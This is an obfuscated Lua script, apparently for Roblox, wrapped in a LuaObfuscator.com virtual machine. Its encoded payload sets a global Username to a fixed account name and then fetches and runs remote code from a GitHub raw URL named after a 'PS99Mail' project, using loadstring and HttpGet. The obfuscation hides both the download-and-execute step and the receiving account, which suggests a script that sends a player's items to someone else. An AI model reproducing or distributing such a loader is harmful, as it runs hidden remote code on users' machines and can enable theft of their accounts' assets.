--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v82,v19);v19=nil;v97=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%1) ;else local v84=931 -(135 + 722 + 74) ;local v85;while true do if (v84==0) then v85=((1447 -(282 + 595)) -(367 + 201))^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (364 -108)) + v36 ;end if (v35==(1065 -((185 -(32 + 85)) + 997))) then v36,v37=v1(v16,v18,v18 + ((1247 + 25) -(226 + 1044)) );v18=v18 + (8 -6) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + ((1763 -802) -((1242 -(87 + 263)) + 65)) ;return (v41 * (40022563 -(23245527 -(67 + 113)))) + (v40 * (121138 -55602)) + (v39 * 256) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(4 -2)) then v47=v20(v44,16 + 5 ,123 -92 );v48=((v20(v44,984 -(802 + 150) )==(2 -1)) and  -(1 -(430 -(44 + 386)))) or 1 ;v42=3 + 0 ;end if (v42==(998 -(915 + (1568 -(998 + 488))))) then v45=2 -(1 + 0) ;v46=(v20(v44,1 + 0 ,17 + 3 ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;v42=2;end if (v42==(775 -(201 + 571))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * 0 ;else local v99=0 + 0 ;while true do if (v99==(0 -0)) then v47=1 + 0 ;v45=791 -(368 + 423) ;break;end end end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * ((3 -2)/(442 -(416 + (1164 -(116 + 1022))))))) or (v48 * NaN) ;end return v8(v48,v47-(3266 -2243) ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end if (v42==(438 -(145 + 293))) then v43=v23();v44=v23();v42=1;end end end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==0) then v51=nil;if  not v49 then local v96=0 -0 ;while true do if ((0 + 0)==v96) then v49=v23();if (v49==((0 -0) -0)) then return "";end break;end end end v50=3 -2 ;end if (v50==3) then return v6(v52);end if (v50==(860 -(814 + 45))) then v51=v3(v16,v18,(v18 + v49) -(2 -(1081 -(1020 + 60))) );v18=v18 + v49 ;v50=2;end if (v50==(1 + 1)) then v52={};for v89=1 + 0 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=888 -(261 + 624) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(1456 -(282 + 1174))) then v54=811 -(569 + 242) ;v55=nil;v53=2 -1 ;end if (v53~=(1 + 2)) then else v60=nil;while true do local v91=1024 -(706 + 318) ;while true do if (v91~=(1251 -(721 + 530))) then else if (v54==(1271 -(945 + 326))) then local v110=0;local v111;while true do if (v110~=0) then else v111=0;while true do if (v111==0) then v55={};v56={};v111=2 -1 ;end if (v111==2) then v54=1 + 0 ;break;end if ((701 -(271 + 429))~=v111) then else local v177=0;while true do if (v177==(1 + 0)) then v111=2;break;end if (v177~=0) then else v57={};v58={v55,v56,nil,v57};v177=1;end end end end break;end end end if (v54==1) then local v112=1288 -(993 + 295) ;while true do if (v112~=(1 + 0)) then else for v134=1,v59 do local v135=0;local v136;local v137;local v138;local v139;while true do if ((1172 -(418 + 753))==v135) then v138=nil;v139=nil;v135=1 + 1 ;end if (v135~=2) then else while true do if (v136==(1 + 0)) then v139=nil;while true do if ((0 + 0)~=v137) then else v138=v21();v139=nil;v137=1 + 0 ;end if (v137==1) then if (v138==(530 -(406 + 123))) then v139=v21()~=(1769 -(1749 + 20)) ;elseif (v138==(1 + 1)) then v139=v24();elseif (v138==(1325 -(1249 + 73))) then v139=v25();end v60[v134]=v139;break;end end break;end if (v136==(0 + 0)) then local v184=1145 -(466 + 679) ;while true do if (v184~=1) then else v136=1;break;end if (v184==0) then v137=0;v138=nil;v184=2 -1 ;end end end end break;end if (v135~=0) then else v136=0 -0 ;v137=nil;v135=1;end end end v58[1903 -(106 + 1794) ]=v21();v112=1 + 1 ;end if (v112==0) then v59=v23();v60={};v112=1;end if (v112==(1 + 1)) then v54=2;break;end end end v91=2 -1 ;end if ((2 -1)==v91) then if ((116 -(4 + 110))==v54) then local v113=584 -(57 + 527) ;while true do if (v113==0) then for v140=1,v23() do local v141=0;local v142;local v143;local v144;while true do if (v141==(1428 -(41 + 1386))) then v144=nil;while true do if (v142==0) then v143=103 -(17 + 86) ;v144=nil;v142=1;end if ((1 + 0)~=v142) then else while true do if (v143==0) then v144=v21();if (v20(v144,1 -0 ,1)==0) then local v186=0 -0 ;local v187;local v188;local v189;local v190;local v191;local v192;while true do if (v186==(167 -(122 + 44))) then v189=nil;v190=nil;v186=2;end if ((5 -2)==v186) then while true do if (v187~=(3 -2)) then else local v193=0;while true do if (v193==(0 + 0)) then v190=nil;v191=nil;v193=1;end if (v193~=1) then else v187=1 + 1 ;break;end end end if (v187==(0 -0)) then local v194=65 -(30 + 35) ;while true do if (v194==(0 + 0)) then v188=1257 -(1043 + 214) ;v189=nil;v194=1;end if (v194==(3 -2)) then v187=1213 -(323 + 889) ;break;end end end if (v187~=2) then else v192=nil;while true do if (v188==(0 -0)) then local v195=580 -(361 + 219) ;local v196;while true do if (v195~=0) then else v196=0;while true do if (v196==(320 -(53 + 267))) then local v208=0 + 0 ;while true do if (v208==1) then v196=1;break;end if (v208==0) then v189=0;v190=nil;v208=1;end end end if (v196==(414 -(15 + 398))) then v188=1;break;end end break;end end end if (v188==(983 -(18 + 964))) then local v197=0 -0 ;local v198;while true do if ((0 + 0)==v197) then v198=0;while true do if (v198==0) then local v209=0 + 0 ;while true do if (v209==1) then v198=851 -(20 + 830) ;break;end if ((0 + 0)~=v209) then else v191=nil;v192=nil;v209=127 -(116 + 10) ;end end end if (v198~=(1 + 0)) then else v188=2;break;end end break;end end end if (v188==(740 -(542 + 196))) then while true do if (0==v189) then local v199=0 -0 ;local v200;while true do if (v199~=0) then else v200=0 + 0 ;while true do if (v200==1) then v189=1;break;end if (v200==0) then local v210=0 + 0 ;while true do if (v210==0) then v190=v20(v144,2,3);v191=v20(v144,2 + 2 ,6);v210=1;end if ((2 -1)~=v210) then else v200=1;break;end end end end break;end end end if (v189~=(2 -1)) then else local v201=0;local v202;while true do if (v201~=(1551 -(1126 + 425))) then else v202=405 -(118 + 287) ;while true do if (0~=v202) then else v192={v22(),v22(),nil,nil};if (v190==(1121 -(118 + 1003))) then local v211=0;local v212;local v213;local v214;while true do if (v211~=1) then else v214=nil;while true do if (v212~=(2 -1)) then else while true do if (0~=v213) then else v214=377 -(142 + 235) ;while true do if ((0 -0)~=v214) then else v192[3]=v22();v192[4]=v22();break;end end break;end end break;end if (v212==0) then local v221=0;while true do if (v221==1) then v212=1;break;end if (v221==0) then v213=0 + 0 ;v214=nil;v221=978 -(553 + 424) ;end end end end break;end if (v211==(0 -0)) then v212=0;v213=nil;v211=1 + 0 ;end end elseif (v190==1) then v192[3]=v23();elseif (v190==(2 + 0)) then v192[3]=v23() -(2^16) ;elseif (v190==(2 + 1)) then local v222=0 + 0 ;local v223;local v224;while true do if (v222==(1 + 0)) then while true do if (v223==(0 -0)) then v224=0 -0 ;while true do if (v224==(0 -0)) then v192[3]=v23() -((1 + 1)^(77 -61)) ;v192[757 -(239 + 514) ]=v22();break;end end break;end end break;end if (0~=v222) then else v223=0;v224=nil;v222=1;end end end v202=1;end if (v202==1) then v189=1 + 1 ;break;end end break;end end end if (v189==(1331 -(797 + 532))) then local v203=0;local v204;while true do if (v203==(0 + 0)) then v204=0;while true do if ((0 + 0)==v204) then if (v20(v191,1,1)~=(2 -1)) then else v192[2]=v60[v192[1204 -(373 + 829) ]];end if (v20(v191,2,733 -(476 + 255) )==1) then v192[1133 -(369 + 761) ]=v60[v192[3]];end v204=1;end if (1==v204) then v189=3;break;end end break;end end end if (v189==3) then if (v20(v191,2 + 1 ,5 -2 )==1) then v192[4]=v60[v192[4]];end v55[v140]=v192;break;end end break;end end break;end end break;end if (v186~=2) then else v191=nil;v192=nil;v186=5 -2 ;end if (v186==(238 -(64 + 174))) then v187=0 + 0 ;v188=nil;v186=1 -0 ;end end end break;end end break;end end break;end if (v141~=(336 -(144 + 192))) then else v142=216 -(42 + 174) ;v143=nil;v141=1 + 0 ;end end end for v145=1 + 0 ,v23() do v56[v145-1 ]=v28();end v113=1 + 0 ;end if (v113==(1505 -(363 + 1141))) then return v58;end end end break;end end end break;end if (v53==1) then v56=nil;v57=nil;v53=1582 -(1183 + 397) ;end if (v53==2) then v58=nil;v59=nil;v53=3;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=4) then if (v80<=1) then if (v80>0) then v71=v79[3];else v77[v79[2]]=v79[3];end elseif (v80<=2) then local v103=0;local v104;local v105;local v106;local v107;while true do if (v103==2) then for v128=v104,v72 do v107=v107 + 1 ;v77[v128]=v105[v107];end break;end if (0==v103) then v104=v79[2];v105,v106=v70(v77[v104](v13(v77,v104 + 1 ,v79[3])));v103=1;end if (v103==1) then v72=(v106 + v104) -1 ;v107=0;v103=2;end end elseif (v80==3) then local v114=0;local v115;while true do if (v114==0) then v115=v79[2];v77[v115]=v77[v115](v13(v77,v115 + 1 ,v72));break;end end else do return;end end elseif (v80<=7) then if (v80<=5) then v63[v79[3]]=v77[v79[2]];elseif (v80==6) then local v116=0;local v117;local v118;while true do if (1==v116) then v77[v117 + 1 ]=v118;v77[v117]=v118[v79[4]];break;end if (v116==0) then v117=v79[2];v118=v77[v79[3]];v116=1;end end else local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (v119==3) then v77[v124 + 1 ]=v123;v77[v124]=v123[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v119=4;end if (v119==7) then v79=v67[v71];v71=v79[3];break;end if (v119==5) then v120=0;for v174=v124,v72 do v120=v120 + 1 ;v77[v174]=v121[v120];end v71=v71 + 1 ;v79=v67[v71];v124=v79[2];v119=6;end if (v119==4) then v71=v71 + 1 ;v79=v67[v71];v124=v79[2];v121,v122=v70(v77[v124](v13(v77,v124 + 1 ,v79[3])));v72=(v122 + v124) -1 ;v119=5;end if (v119==0) then v120=nil;v121,v122=nil;v123=nil;v124=nil;v63[v79[3]]=v77[v79[2]];v119=1;end if (v119==6) then v77[v124]=v77[v124](v13(v77,v124 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v119=7;end if (v119==1) then v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v119=2;end if (v119==2) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v124=v79[2];v123=v77[v79[3]];v119=3;end end end elseif (v80<=8) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>9) then v77[v79[2]]();elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030D3O00636872697374616C74612O6331030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O00124O00013O0026083O0001000100010004013O0001000100122O000100033O001207000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004013O000100012O00043O00017O00",v9(),...);
